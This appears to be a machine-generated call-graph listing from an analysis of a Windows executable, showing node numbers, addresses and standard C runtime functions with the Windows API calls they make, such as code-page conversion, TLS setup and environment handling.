___scrt_uninitialize_crt WideCharToMultiByte 10825->10827 10826->10839 10866 251349 10826->10866 10828 251635 10827->10828 10830 251652 10828->10830 10831 25163c GetLastError 10828->10831 10833 251663 10830->10833 10835 251349 15 API calls 10830->10835 10832 25079d __dosmaperr 14 API calls 10831->10832 10834 251648 10832->10834 10836 2515b4 WideCharToMultiByte 10833->10836 10833->10839 10837 250777 __strnicoll 14 API calls 10834->10837 10835->10833 10838 251679 10836->10838 10837->10839 10838->10839 10840 25167d GetLastError 10838->10840 10839->10741 10841 25079d __dosmaperr 14 API calls 10840->10841 10842 251689 10841->10842 10843 250777 __strnicoll 14 API calls 10842->10843 10843->10839 10845 253f9a 10844->10845 10846 250777 __strnicoll 14 API calls 10845->10846 10851 253fae 10845->10851 10847 253fa3 10846->10847 10848 24cd89 __strnicoll 48 API calls 10847->10848 10848->10851 10849 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10850 251a1a 10849->10850 10850->10746 10851->10849 10851->10851 10853 254575 10852->10853 10854 254589 10852->10854 10855 250777 __strnicoll 14 API calls 10853->10855 10856 254591 10854->10856 10857 2545a3 10854->10857 10858 25457a 10855->10858 10859 250777 __strnicoll 14 API calls 10856->10859 10860 24f8e8 __strnicoll 48 API calls 10857->10860 10863 2545a1 10857->10863 10861 24cd89 __strnicoll 48 API calls 10858->10861 10862 254596 10859->10862 10860->10863 10864 254585 10861->10864 10865 24cd89 __strnicoll 48 API calls 10862->10865 10863->10820 10864->10820 10865->10863 10867 251312 14 API calls 10866->10867 10868 251357 10867->10868 10869 251275 15 API calls 10868->10869 10870 251365 10869->10870 10870->10839 10872 24c6ee 10871->10872 10876 24c70e 10871->10876 10873 250777 __strnicoll 14 API calls 10872->10873 10874 24c704 10873->10874 10875 24cd89 __strnicoll 48 API calls 10874->10875 10875->10876 10876->10576 10886 24c330 10889 24c357 10886->10889 10890 24c363 ___scrt_is_nonwritable_in_current_image 10889->10890 10897 24d181 EnterCriticalSection 10890->10897 10892 24c39b 10898 24c3b9 10892->10898 10893 24c36d 10893->10892 10895 25121a __strnicoll 14 API calls 10893->10895 10895->10893 10897->10893 10901 24d198 LeaveCriticalSection 10898->10901 10900 24c355 10901->10900 8898 24a702 8899 24a70e ___scrt_is_nonwritable_in_current_image 8898->8899 8924 24a0af 8899->8924 8901 24a715 8902 24a86e 8901->8902 8910 24a73f ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 8901->8910 8963 24a464 IsProcessorFeaturePresent 8902->8963 8904 24a875 8905 24a87b 8904->8905 8906 24bef5 21 API calls 8904->8906 8967 24bf0b 8905->8967 8906->8905 8909 24a75e 8910->8909 8911 24a7df 8910->8911 8948 24bf3f 8910->8948 8935 24ca76 8911->8935 8914 24a7e5 8939 23de10 8914->8939 8917 24a40c __CreateFrameInfo GetModuleHandleW 8918 24a806 8917->8918 8918->8904 8919 24a80a 8918->8919 8920 24a813 8919->8920 8954 24bf21 8919->8954 8957 24a0e8 8920->8957 8925 24a0b8 8924->8925 8970 24a220 IsProcessorFeaturePresent 8925->8970 8929 24a0c9 8930 24a0cd 8929->8930 8980 24ba80 8929->8980 8930->8901 8933 24a0e4 8933->8901 8936 24ca7f 8935->8936 8937 24ca84 8935->8937 9052 24cb9f 8936->9052 8937->8914 9915 23deb0 8939->9915 8946 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8947 23dea4 8946->8947 8947->8917 8949 24bf55 ___scrt_is_nonwritable_in_current_image _unexpected 8948->8949 8949->8911 8950 24f02a _unexpected 48 API calls 8949->8950 8953 24d49c 8950->8953 8951 24d37d CallUnexpected 48 API calls 8952 24d4c6 8951->8952 8953->8951 8955 24c040 __CreateFrameInfo 21 API calls 8954->8955 8956 24bf2c 8955->8956 8956->8920 8958 24a0f4 8957->8958 8959 24a10a 8958->8959 10326 24ba92 8958->10326 8959->8909 8961 24a102 8962 24b0ea ___scrt_uninitialize_crt 7 API calls 8961->8962 8962->8959 8964 24a47a __CreateFrameInfo std::bad_exception::bad_exception 8963->8964 8965 24a525 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8964->8965 8966 24a570 __CreateFrameInfo 8965->8966 8966->8904 8968 24c040 __CreateFrameInfo 21 API calls 8967->8968 8969 24a883 8968->8969 8971 24a0c4 8970->8971 8972 24b0cb 8971->8972 8989 24e726 8972->8989 8975 24b0d4 8975->8929 8977 24b0dc 8978 24b0e7 8977->8978 9003 24e762 8977->9003 8978->8929 9043 250125 8980->9043 8983 24b0ea 8984 24b0f3 8983->8984 8985 24b0fd 8983->8985 8986 24d831 ___vcrt_uninitialize_ptd 6 API calls 8984->8986 8985->8930 8987 24b0f8 8986->8987 8988 24e762 ___vcrt_uninitialize_locks DeleteCriticalSection 8987->8988 8988->8985 8990 24e72f 8989->8990 8992 24e758 8990->8992 8993 24b0d0 8990->8993 9007 252c37 8990->9007 8994 24e762 ___vcrt_uninitialize_locks DeleteCriticalSection 8992->8994 8993->8975 8995 24d7fe 8993->8995 8994->8993 9024 252b48 8995->9024 8998 24d813 8998->8977 9001 24d82e 9001->8977 9004 24e76d 9003->9004 9006 24e78c 9003->9006 9005 24e777 DeleteCriticalSection 9004->9005 9005->9005 9005->9006 9006->8975 9012 252cc9 9007->9012 9010 252c6f InitializeCriticalSectionAndSpinCount 9011 252c5a 9010->9011 9011->8990 9013 252c51 9012->9013 9014 252cea 9012->9014 9013->9010 9013->9011 9014->9013 9015 252d52 GetProcAddress 9014->9015 9017 252d43 9014->9017 9019 252c7e LoadLibraryExW 9014->9019 9015->9013 9017->9015 9018 252d4b FreeLibrary 9017->9018 9018->9015 9020 252c95 GetLastError 9019->9020 9021 252cc5 9019->9021 9020->9021 9022 252ca0 ___vcrt_FlsGetValue 9020->9022 9021->9014 9022->9021 9023 252cb6 LoadLibraryExW 9022->9023 9023->9014 9025 252cc9 ___vcrt_FlsGetValue 5 API calls 9024->9025 9026 252b62 9025->9026 9027 252b7b TlsAlloc 9026->9027 9028 24d808 9026->9028 9028->8998 9029 252bf9 9028->9029 9030 252cc9 ___vcrt_FlsGetValue 5 API calls 9029->9030 9031 252c13 9030->9031 9032 252c2e TlsSetValue 9031->9032 9033 24d821 9031->9033 9032->9033 9033->9001 9034 24d831 9033->9034 9035 24d841 9034->9035 9036 24d83b 9034->9036 9035->8998 9038 252b83 9036->9038 9039 252cc9 ___vcrt_FlsGetValue 5 API calls 9038->9039 9040 252b9d 9039->9040 9041 252bb5 TlsFree 9040->9041 9042 252ba9 9040->9042 9041->9042 9042->9035 9044 250135 9043->9044 9045 24a0d6 9043->9045 9044->9045 9047 24f752 9044->9047 9045->8933 9045->8983 9048 24f759 9047->9048 9049 24f79c GetStdHandle 9048->9049 9050 24f7fe 9048->9050 9051 24f7af GetFileType 9048->9051 9049->9048 9050->9044 9051->9048 9053 24cba8 9052->9053 9056 24cbbe 9052->9056 9053->9056 9058 24cae0 9053->9058 9055 24cbb5 9055->9056 9075 24ccad 9055->9075 9056->8937 9059 24caec 9058->9059 9060 24cae9 9058->9060 9084 24f8a0 9059->9084 9060->9055 9065 24cafd 9067 2500eb __freea 14 API calls 9065->9067 9066 24cb09 9111 24cbcb 9066->9111 9069 24cb03 9067->9069 9069->9055 9071 2500eb __freea 14 API calls 9072 24cb2d 9071->9072 9073 2500eb __freea 14 API calls 9072->9073 9074 24cb33 9073->9074 9074->9055 9076 24cd1e 9075->9076 9081 24ccbc 9075->9081 9076->9056 9077 252151 WideCharToMultiByte ___scrt_uninitialize_crt 9077->9081 9078 250827 _unexpected 14 API calls 9078->9081 9079 24cd22 9080 2500eb __freea 14 API calls 9079->9080 9080->9076 9081->9076 9081->9077 9081->9078 9081->9079 9083 2500eb __freea 14 API calls 9081->9083 9634 252324 9081->9634 9083->9081 9085 24f8a9 9084->9085 9089 24caf2 9084->9089 9133 24f0e5 9085->9133 9090 25224d GetEnvironmentStringsW 9089->9090 9091 252265 9090->9091 9092 24caf7 9090->9092 9093 252151 ___scrt_uninitialize_crt WideCharToMultiByte 9091->9093 9092->9065 9092->9066 9094 252282 9093->9094 9095 252297 9094->9095 9096 25228c FreeEnvironmentStringsW 9094->9096 9097 250c65 __strnicoll 15 API calls 9095->9097 9096->9092 9098 25229e 9097->9098 9099 2522b7 9098->9099 9100 2522a6 9098->9100 9102 252151 ___scrt_uninitialize_crt WideCharToMultiByte 9099->9102 9101 2500eb __freea 14 API calls 9100->9101 9103 2522ab FreeEnvironmentStringsW 9101->9103 9104 2522c7 9102->9104 9103->9092 9105 2522d6 9104->9105 9106 2522ce 9104->9106 9107 2500eb __freea 14 API calls 9105->9107 9108 2500eb __freea 14 API calls 9106->9108 9109 2522d4 FreeEnvironmentStringsW 9107->9109 9108->9109 9109->9092 9112 24cbe0 9111->9112 9113 250827 _unexpected 14 API calls 9112->9113 9114 24cc07 9113->9114 9115 24cc0f 9114->9115 9124 24cc19 9114->9124 9116 2500eb __freea 14 API calls 9115->9116 9132 24cb10 9116->9132 9117 24cc76 9118 2500eb __freea 14 API calls 9117->9118 9118->9132 9119 250827 _unexpected 14 API calls 9119->9124 9120 24cc85 9624 24cb70 9120->9624 9124->9117 9124->9119 9124->9120 9125 24cca0 9124->9125 9127 2500eb __freea 14 API calls 9124->9127 9615 24e6cc 9124->9615 9630 24cdb6 IsProcessorFeaturePresent 9125->9630 9126 2500eb __freea 14 API calls 9129 24cc92 9126->9129 9127->9124 9131 2500eb __freea 14 API calls 9129->9131 9130 24ccac 9131->9132 9132->9071 9134 24f0f0 9133->9134 9138 24f0f6 9133->9138 9180 24ebb0 9134->9180 9139 24f0fc 9138->9139 9185 24ebef 9138->9185 9142 24f101 9139->9142 9204 24d37d 9139->9204 9158 24fce3 9142->9158 9145 24f13d 9148 24ebef _unexpected 6 API calls 9145->9148 9146 24f128 9147 24ebef _unexpected 6 API calls 9146->9147 9149 24f134 9147->9149 9150 24f149 9148->9150 9155 2500eb __freea 14 API calls 9149->9155 9151 24f15c 9150->9151 9152 24f14d 9150->9152 9199 24f33c 9151->9199 9153 24ebef _unexpected 6 API calls 9152->9153 9153->9149 9155->9139 9157 2500eb __freea 14 API calls 9157->9142 9159 24fd0d 9158->9159 9439 24fb6f 9159->9439 9162 24fd26 9162->9089 9165 24fd4d 9453 24f96a 9165->9453 9166 24fd3f 9167 2500eb __freea 14 API calls 9166->9167 9167->9162 9170 24fd85 9171 250777 __strnicoll 14 API calls 9170->9171 9172 24fd8a 9171->9172 9173 2500eb __freea 14 API calls 9172->9173 9173->9162 9174 24fda0 9176 2500eb __freea 14 API calls 9174->9176 9178 24fdcc 9174->9178 9175 2500eb __freea 14 API calls 9175->9162 9176->9178 9179 24fe15 9178->9179 9464 25009e 9178->9464 9179->9175 9181 24eebe _unexpected 5 API calls 9180->9181 9182 24ebcc 9181->9182 9183 24ebd5 9182->9183 9184 24ebe7 TlsGetValue 9182->9184 9183->9138 9186 24eebe _unexpected 5 API calls 9185->9186 9187 24ec0b 9186->9187 9188 24ec29 TlsSetValue 9187->9188 9189 24ec14 9187->9189 9189->9139 9190 250827 9189->9190 9191 250834 9190->9191 9192 250874 9191->9192 9193 25085f HeapAlloc 9191->9193 9198 250848 _unexpected 9191->9198 9195 250777 __strnicoll 13 API calls 9192->9195 9194 250872 9193->9194 9193->9198 9196 24f120 9194->9196 9195->9196 9196->9145 9196->9146 9197 24c227 _unexpected 2 API calls 9197->9198 9198->9192 9198->9193 9198->9197 9213 24f4a2 9199->9213 9315 2501dc 9204->9315 9206 24d382 9206->9204 9208 24d397 IsProcessorFeaturePresent 9206->9208 9209 24bf0b __CreateFrameInfo 21 API calls 9206->9209 9212 24d859 9206->9212 9318 250203 9206->9318 9345 24cdea 9206->9345 9351 24d85a 9206->9351 9208->9206 9209->9206 9214 24f4ae ___scrt_is_nonwritable_in_current_image 9213->9214 9227 24d181 EnterCriticalSection 9214->9227 9216 24f4b8 9228 24f4e8 9216->9228 9219 24f4f4 9220 24f500 ___scrt_is_nonwritable_in_current_image 9219->9220 9232 24d181 EnterCriticalSection 9220->9232 9222 24f50a 9233 24f2f1 9222->9233 9224 24f522 9237 24f542 9224->9237 9227->9216 9231 24d198 LeaveCriticalSection 9228->9231 9230 24f3aa 9230->9219 9231->9230 9232->9222 9234 24f327 _unexpected 9233->9234 9235 24f300 _unexpected 9233->9235 9234->9224 9235->9234 9240 250fce 9235->9240 9314 24d198 LeaveCriticalSection 9237->9314 9239 24f167 9239->9157 9241 25104e 9240->9241 9244 250fe4 9240->9244 9242 25109c 9241->9242 9245 2500eb __freea 14 API calls 9241->9245 9308 251168 9242->9308 9244->9241 9246 251017 9244->9246 9251 2500eb __freea 14 API calls 9244->9251 9247 251070 9245->9247 9248 251039 9246->9248 9256 2500eb __freea 14 API calls 9246->9256 9249 2500eb __freea 14 API calls 9247->9249 9250 2500eb __freea 14 API calls 9248->9250 9252 251083 9249->9252 9253 251043 9250->9253 9255 25100c 9251->9255 9257 2500eb __freea 14 API calls 9252->9257 9258 2500eb __freea 14 API calls 9253->9258 9254 25110a 9259 2500eb __freea 14 API calls 9254->9259 9268 2509f5 9255->9268 9261 25102e 9256->9261 9262 251091 9257->9262 9258->9241 9263 251110 9259->9263 9296 250af3 9261->9296 9266 2500eb __freea 14 API calls 9262->9266 9263->9234 9264 2510aa 9264->9254 9267 2500eb 14 API calls __freea 9264->9267 9266->9242 9267->9264 9269 250a06 9268->9269 9295 250aef 9268->9295 9270 250a17 9269->9270 9271 2500eb __freea 14 API calls 9269->9271 9272 250a29 9270->9272 9273 2500eb __freea 14 API calls 9270->9273 9271->9270 9274 2500eb __freea 14 API calls 9272->9274 9275 250a3b 9272->9275 9273->9272 9274->9275 9276 2500eb __freea 14 API calls 9275->9276 9278 250a4d 9275->9278 9276->9278 9277 250a5f 9280 250a71 9277->9280 9282 2500eb __freea 14 API calls 9277->9282 9278->9277 9279 2500eb __freea 14 API calls 9278->9279 9279->9277 9281 250a83 9280->9281 9283 2500eb __freea 14 API calls 9280->9283 9284 250a95 9281->9284 9285 2500eb __freea 14 API calls 9281->9285 9282->9280 9283->9281 9286 250aa7 9284->9286 9287 2500eb __freea 14 API calls 9284->9287 9285->9284 9288 250ab9 9286->9288 9290 2500eb __freea 14 API calls 9286->9290 9287->9286 9289 250acb 9288->9289 9291 2500eb __freea 14 API calls 9288->9291 9292 250add 9289->9292 9293 2500eb __freea 14 API calls 9289->9293 9290->9288 9291->9289 9294 2500eb __freea 14 API calls 9292->9294 9292->9295 9293->9292 9294->9295 9295->9246 9297 250b00 9296->9297 9298 250b58 9296->9298 9299 250b10 9297->9299 9300 2500eb __freea 14 API calls 9297->9300 9298->9248 9301 250b22 9299->9301 9302 2500eb __freea 14 API calls 9299->9302 9300->9299 9303 250b34 9301->9303 9304 2500eb __freea 14 API calls 9301->9304 9302->9301 9305 250b46 9303->9305 9306 2500eb __freea 14 API calls 9303->9306 9304->9303 9305->9298 9307 2500eb __freea 14 API calls 9305->9307 9306->9305 9307->9298 9309 251175 9308->9309 9313 251194 9308->9313 9310 250b5c _unexpected 14 API calls 9309->9310 9309->9313 9311 25118e 9310->9311 9312 2500eb __freea 14 API calls 9311->9312 9312->9313 9313->9264 9314->9239 9365 25045f 9315->9365 9323 25020f ___scrt_is_nonwritable_in_current_image 9318->9323 9319 24f17b __dosmaperr 14 API calls 9327 250240 __CreateFrameInfo 9319->9327 9320 25025f 9322 250777 __strnicoll 14 API calls 9320->9322 9321 250271 __CreateFrameInfo 9324 2502a7 __CreateFrameInfo 9321->9324 9379 24d181 EnterCriticalSection 9321->9379 9325 250264 9322->9325 9323->9319 9323->9320 9323->9321 9323->9327 9330 2502e4 9324->9330 9331 2503e1 9324->9331 9341 250312 9324->9341 9376 24cd89 9325->9376 9327->9320 9327->9321 9344 250249 9327->9344 9330->9341 9380 24f02a GetLastError 9330->9380 9332 2503ec 9331->9332 9411 24d198 LeaveCriticalSection 9331->9411 9335 24bf0b __CreateFrameInfo 21 API calls 9332->9335 9337 2503f4 9335->9337 9339 24f02a _unexpected 48 API calls 9342 250367 9339->9342 9340 24f02a _unexpected 48 API calls 9340->9341 9407 25038d 9341->9407 9343 24f02a _unexpected 48 API calls 9342->9343 9342->9344 9343->9344 9344->9206 9346 24ce06 __CreateFrameInfo std::bad_exception::bad_exception 9345->9346 9347 24ce32 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9346->9347 9348 24cf03 __CreateFrameInfo 9347->9348 9349 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9348->9349 9350 24cf21 9349->9350 9350->9206 9352 24d866 GetLastError 9351->9352 9353 24d863 9351->9353 9434 252bbe 9352->9434 9353->9206 9356 24d89a 9357 24d8e0 SetLastError 9356->9357 9357->9206 9358 252bf9 ___vcrt_FlsSetValue 6 API calls 9359 24d894 __CreateFrameInfo 9358->9359 9359->9356 9360 24d8bc 9359->9360 9361 252bf9 ___vcrt_FlsSetValue 6 API calls 9359->9361 9362 252bf9 ___vcrt_FlsSetValue 6 API calls 9360->9362 9363 24d8d0 9360->9363 9361->9360 9362->9363 9364 24d3cc ___vcrt_freefls@4 14 API calls 9363->9364 9364->9356 9366 25046b ___scrt_is_nonwritable_in_current_image 9365->9366 9371 24d181 EnterCriticalSection 9366->9371 9368 250479 9372 2504bb 9368->9372 9371->9368 9375 24d198 LeaveCriticalSection 9372->9375 9374 250201 9374->9206 9375->9374 9412 24d0bf 9376->9412 9379->9324 9381 24f040 9380->9381 9385 24f046 9380->9385 9383 24ebb0 _unexpected 6 API calls 9381->9383 9382 24ebef _unexpected 6 API calls 9384 24f062 9382->9384 9383->9385 9387 250827 _unexpected 14 API calls 9384->9387 9404 24f04a SetLastError 9384->9404 9385->9382 9385->9404 9388 24f077 9387->9388 9391 24f090 9388->9391 9392 24f07f 9388->9392 9389 24f0df 9393 24d37d CallUnexpected 46 API calls 9389->9393 9390 24f0da 9390->9340 9395 24ebef _unexpected 6 API calls 9391->9395 9394 24ebef _unexpected 6 API calls 9392->9394 9396 24f0e4 9393->9396 9397 24f08d 9394->9397 9398 24f09c 9395->9398 9401 2500eb __freea 14 API calls 9397->9401 9399 24f0b7 9398->9399 9400 24f0a0 9398->9400 9402 24f33c _unexpected 14 API calls 9399->9402 9403 24ebef _unexpected 6 API calls 9400->9403 9401->9404 9405 24f0c2 9402->9405 9403->9397 9404->9389 9404->9390 9406 2500eb __freea 14 API calls 9405->9406 9406->9404 9408 250391 9407->9408 9409 250359 9407->9409 9433 24d198 LeaveCriticalSection 9408->9433 9409->9339 9409->9342 9409->9344 9411->9332 9413 24d0d1 __strnicoll 9412->9413 9418 24cf32 9413->9418 9419 24cf42 9418->9419 9420 24cf49 9418->9420 9422 24d050 __strnicoll 16 API calls 9419->9422 9421 24cf57 9420->9421 9423 24d096 __strnicoll GetLastError SetLastError 9420->9423 9427 24cff7 9421->9427 9422->9420 9424 24cf7e 9423->9424 9424->9421 9425 24cdb6 __strnicoll 11 API calls 9424->9425 9426 24cfae 9425->9426 9428 24d003 9427->9428 9429 24d01a 9428->9429 9430 24d033 __strnicoll 48 API calls 9428->9430 9431 24cd95 9429->9431 9432 24d033 __strnicoll 48 API calls 9429->9432 9430->9429 9431->9344 9432->9431 9433->9409 9435 252cc9 ___vcrt_FlsGetValue 5 API calls 9434->9435 9436 252bd8 9435->9436 9437 252bf0 TlsGetValue 9436->9437 9438 24d87b 9436->9438 9437->9438 9438->9356 9438->9357 9438->9358 9472 24f8e8 9439->9472 9442 24fb90 GetOEMCP 9445 24fbb9 9442->9445 9443 24fba2 9444 24fba7 GetACP 9443->9444 9443->9445 9444->9445 9445->9162 9446 250c65 9445->9446 9447 250ca3 9446->9447 9452 250c73 _unexpected 9446->9452 9449 250777 __strnicoll 14 API calls 9447->9449 9448 250c8e RtlAllocateHeap 9450 24fd37 9448->9450 9448->9452 9449->9450 9450->9165 9450->9166 9451 24c227 _unexpected 2 API calls 9451->9452 9452->9447 9452->9448 9452->9451 9454 24fb6f 50 API calls 9453->9454 9455 24f98a 9454->9455 9456 24fa8f 9455->9456 9458 24f9c7 IsValidCodePage 9455->9458 9463 24f9e2 std::bad_exception::bad_exception 9455->9463 9457 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9456->9457 9459 24fb6d 9457->9459 9458->9456 9460 24f9d9 9458->9460 9459->9170 9459->9174 9461 24fa02 GetCPInfo 9460->9461 9460->9463 9461->9456 9461->9463 9512 24fef9 9463->9512 9465 2500aa ___scrt_is_nonwritable_in_current_image 9464->9465 9589 24d181 EnterCriticalSection 9465->9589 9467 2500b4 9590 24fe38 9467->9590 9473 24f906 9472->9473 9479 24f8ff 9472->9479 9474 24f02a _unexpected 48 API calls 9473->9474 9473->9479 9475 24f927 9474->9475 9480 25297d 9475->9480 9479->9442 9479->9443 9481 24f93d 9480->9481 9482 252990 9480->9482 9484 2529aa 9481->9484 9482->9481 9488 251199 9482->9488 9485 2529bd 9484->9485 9487 2529d2 9484->9487 9485->9487 9509 24f883 9485->9509 9487->9479 9489 2511a5 ___scrt_is_nonwritable_in_current_image 9488->9489 9490 24f02a _unexpected 48 API calls 9489->9490 9491 2511ae 9490->9491 9498 2511f4 9491->9498 9501 24d181 EnterCriticalSection 9491->9501 9493 2511cc 9502 25121a 9493->9502 9498->9481 9499 24d37d CallUnexpected 48 API calls 9500 251219 9499->9500 9501->9493 9503 251228 _unexpected 9502->9503 9505 2511dd 9502->9505 9504 250fce _unexpected 14 API calls 9503->9504 9503->9505 9504->9505 9506 2511f9 9505->9506 9507 24d198 __CreateFrameInfo LeaveCriticalSection 9506->9507 9508 2511f0 9507->9508 9508->9498 9508->9499 9510 24f02a _unexpected 48 API calls 9509->9510 9511 24f888 9510->9511 9511->9487 9513 24ff21 GetCPInfo 9512->9513 9514 24ffea 9512->9514 9513->9514 9517 24ff39 9513->9517 9516 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9514->9516 9519 25009c 9516->9519 9523 250d0d 9517->9523 9519->9456 9522 252ef4 52 API calls 9522->9514 9524 24f8e8 __strnicoll 48 API calls 9523->9524 9525 250d2d 9524->9525 9543 250e0e 9525->9543 9527 250de9 9529 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9527->9529 9528 250de1 9546 250ced 9528->9546 9532 24ffa1 9529->9532 9530 250d5a 9530->9527 9530->9528 9531 250c65 __strnicoll 15 API calls 9530->9531 9534 250d7f __alloca_probe_16 std::bad_exception::bad_exception 9530->9534 9531->9534 9538 252ef4 9532->9538 9534->9528 9535 250e0e __strnicoll MultiByteToWideChar 9534->9535 9536 250dc8 9535->9536 9536->9528 9537 250dcf GetStringTypeW 9536->9537 9537->9528 9539 24f8e8 __strnicoll 48 API calls 9538->9539 9540 252f07 9539->9540 9552 252f3d 9540->9552 9550 250e38 9543->9550 9547 250cf9 9546->9547 9548 250d0a 9546->9548 9547->9548 9549 2500eb __freea 14 API calls 9547->9549 9548->9527 9549->9548 9551 250e2a MultiByteToWideChar 9550->9551 9551->9530 9553 252f58 __strnicoll 9552->9553 9554 250e0e __strnicoll MultiByteToWideChar 9553->9554 9557 252f9c 9554->9557 9555 249261 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9558 24ffc2 9555->9558 9556 252fc2 __alloca_probe_16 9562 250e0e __strnicoll MultiByteToWideChar 9556->9562 9572 25306a 9556->9572 9557->9556 9559 250c65 __strnicoll 15 API calls 9557->9559 9561 253117 9557->9561 9557->9572 9558->9522 9559->9556 9560 250ced __freea 14 API calls 9560->9561 9561->9555 9563 25300b 9562->9563 9563->9572 9580 24ec7c 9563->9580 9566 253041 9570 24ec7c 6 API calls 9566->9570 9566->9572 9567 253079 9568 253102 9567->9568 9571 250c65 __strnicoll 15 API calls 9567->9571 9573 25308b __alloca_probe_16 9567->9573 9569 250ced __freea 14 API calls 9568->9569 9569->9572 9570->9572 9571->9573 9572->9560 9573->9568 9574 24ec7c 6 API calls 9573->9574 9575 2530ce 9574->9575 9575->9568 9586 252151 9575->9586 9577 2530e8 9577->9568 9578 2530f1 9577->9578 9579 250ced __freea 14 API calls 9578->9579 9579->9572 9581 24ef77 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9580->9581 9582 24ec87 9581->9582 9583 24ec8d 9582->9583 9584 24ecd9 __strnicoll 5 API calls 9582->9584 9583->9566 9583->9567 9583->9572 9585 24eccd LCMapStringW 9584->9585 9585->9583 9587 252164 ___scrt_uninitialize_crt 9586->9587 9588 2521a2 WideCharToMultiByte 9587->9588 9588->9577 9589->9467 9600 24f802 9590->9600 9592 24fe5a 9593 24f802 48 API calls 9592->9593 9594 24fe79 9593->9594 9595 2500eb __freea 14 API calls 9594->9595 9596 24fea0 9594->9596 9595->9596 9597 2500df 9596->9597 9614 24d198 LeaveCriticalSection 9597->9614 9599 2500cd 9599->9179 9601 24f813 9600->9601 9610 24f80f CatchIt 9600->9610 9602 24f81a 9601->9602 9605 24f82d std::bad_exception::bad_exception 9601->9605 9603 250777 __strnicoll 14 API calls 9602->9603 9604 24f81f 9603->9604 9606 24cd89 __strnicoll 48 API calls 9604->9606 9607 24f864 9605->9607 9608 24f85b 9605->9608 9605->9610 9606->9610 9607->9610 9611 250777 __strnicoll 14 API calls 9607->9611 9609 250777 __strnicoll 14 API calls 9608->9609 9612 24f860 9609->9612 9610->9592 9611->9612 9613 24cd89 __strnicoll 48 API calls 9612->9613 9613->9610 9614->9599 9616 24e6da 9615->9616 9617 24e6e8 9615->9617 9616->9617 9622 24e700 9616->9622 9618 250777 __strnicoll 14 API calls 9617->9618 9619 24e6f0 9618->9619 9621 24cd89 __strnicoll 48 API calls 9619->9621 9620 24e6fa 9620->9124 9621->9620 9622->9620 9623 250777 __strnicoll 14 API calls 9622->9623 9623->9619 9628 24cb7d 9624->9628 9629 24cb9a 9624->9629 9625 24cb94 9626 2500eb __freea 14 API calls 9625->9626 9626->9629 9627 2500eb __freea 14 API calls 9627->9628 9628->9625 9628->9627 9629->9126 9631 24cdc2 9630->9631 9632 24cdea __CreateFrameInfo 8 API calls 9631->9632 9633 24cdd7 GetCurrentProcess TerminateProcess 9632->9633 9633->9130 9635 25232f 9634->9635 9636 252340 9635->9636 9639 252353 ___from_strstr_to_strchr 9635->9639 9637 250777 __strnicoll 14 API calls 9636->9637 9638 252345 9637->9638 9638->9081 9640 25256a 9639->9640 9642 252373 9639->9642 9641 250777 __strnicoll 14 API calls 9640->9641 9643 25256f 9641->9643 9697 25258f 9642->9697 9645 2500eb __freea 14 API calls 9643->9645 9645->9638 9647 2523b9 9648 2523a3 9647->9648 9652 250827 _unexpected 14 API calls 9647->9652 9654 2500eb __freea 14 API calls 9648->9654 9649 252395 9656 2523b2 9649->9656 9657 25239e 9649->9657 9653 2523c7 9652->9653 9655 2500eb __freea 14 API calls 9653->9655 9654->9638 9659 2523d2 9655->9659 9661 25258f 48 API calls 9656->9661 9660 250777 __strnicoll 14 API calls 9657->9660 9658 25242c 9662 2500eb __freea 14 API calls 9658->9662 9659->9648 9666 250827 _unexpected 14 API calls 9659->9666 9674 2523b7 9659->9674 9660->9648 9661->9674 9668 252434 9662->9668 9663 252477 9663->9648 9664 2520e4 51 API calls 9663->9664 9665 2524a5 9664->9665 9667 2500eb __freea 14 API calls 9665->9667 9669 2523ee 9666->9669 9677 252461 9667->9677 9668->9677 9705 2520e4 9668->9705 9672 2500eb __freea 14 API calls 9669->9672 9670 2500eb __freea 14 API calls 9670->9638 9672->9674 9673 252458 9675 2500eb __freea 14 API calls 9673->9675 9674->9648 9701 2525a9 9674->9701 9675->9677 9676 250827 _unexpected 14 API calls 9678 2524f0 9676->9678 9677->9648 9677->9676 9695 25255f 9677->9695 9679 252500 9678->9679 9680 2524f8 9678->9680 9682 24e6cc ___std_exception_copy 48 API calls 9679->9682 9681 2500eb __freea 14 API calls 9680->9681 9681->9648 9683 25250c 9682->9683 9684 252584 9683->9684 9685 252513 9683->9685 9687 24cdb6 __strnicoll 11 API calls 9684->9687 9714 2549dc 9685->9714 9689 25258e 9687->9689 9690 252559 9693 2500eb __freea 14 API calls 9690->9693 9691 25253a 9692 250777 __strnicoll 14 API calls 9691->9692 9694 25253f 9692->9694 9693->9695 9696 2500eb __freea 14 API calls 9694->9696 9695->9670 9696->9648 9698 25259c 9697->9698 9699 25237e 9697->9699 9729 2525fe 9698->9729 9699->9647 9699->9649 9699->9674 9702 25241c 9701->9702 9704 2525bf 9701->9704 9702->9658 9702->9663 9704->9702 9744 2548eb 9704->9744 9706 2520f1 9705->9706 9707 25210c 9705->9707 9706->9707 9708 2520fd 9706->9708 9709 25211b 9707->9709 9844 254718 9707->9844 9710 250777 __strnicoll 14 API calls 9708->9710 9851 25474b 9709->9851 9713 252102 std::bad_exception::bad_exception 9710->9713 9713->9673 9863 251294 9714->9863 9719 251294 48 API calls 9723 254a2c 9719->9723 9720 254a4f 9721 254a5b 9720->9721 9724 2500eb __freea 14 API calls 9720->9724 9722 252534 9721->9722 9725 2500eb __freea 14 API calls 9721->9725 9722->9690 9722->9691 9726 25132c 17 API calls 9723->9726 9724->9721 9725->9722 9727 254a39 9726->9727 9727->9720 9728 254a43 SetEnvironmentVariableW 9727->9728 9728->9720 9730 252611 9729->9730 9731 25260c 9729->9731 9732 250827 _unexpected 14 API calls 9730->9732 9731->9699 9733 25262e 9732->9733 9734 25269c 9733->9734 9737 2526a1 9733->9737 9740 250827 _unexpected 14 API calls 9733->9740 9741 2500eb __freea 14 API 